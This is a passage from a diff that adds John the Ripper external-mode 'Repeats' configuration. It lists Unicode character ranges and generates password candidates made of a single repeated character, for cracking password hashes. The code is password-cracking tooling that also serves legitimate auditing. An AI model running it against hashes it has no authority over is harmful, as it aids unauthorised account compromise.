+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -0,0 +1,2378 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Full Unicode (version 11) version
+#
+# Number of candidates = 137,046 x length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Repeats32]
+int minlength, maxlength, maxc, length, c;
+int charset[0x22000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
